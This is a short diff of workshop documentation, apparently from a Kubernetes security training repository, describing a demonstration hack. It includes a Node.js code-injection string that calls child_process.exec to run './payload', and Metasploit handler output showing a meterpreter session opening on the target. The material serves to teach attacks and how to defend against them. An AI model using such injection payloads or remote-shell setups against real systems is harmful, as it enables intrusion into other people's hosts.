HashiCraft/securing-kubernetes/docs/execute_hack.md

 <div>String: x,y'-require('child_process').exec('./payload')-'</div><div> Mobile version </div>
 ```

-As soon as the payload gets executed, we see a session show up and a meterpreter session is automatically opened on the target host.
+As soon as the payload gets executed, we see a session show up in the metasploit console and a meterpreter session is automatically opened on the target host.

 ```shell
 [*] http://0.0.0.0:9999 handling request from 10.5.0.4; (UUID: w26bw3o1) Redirecting stageless connection from /h7sUeWnwyAwFZgNnWs3kzgCzN70KnX64Dz_mC1nzQlzyq-Uk9uMBpMDwp9GU6yZ9 with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'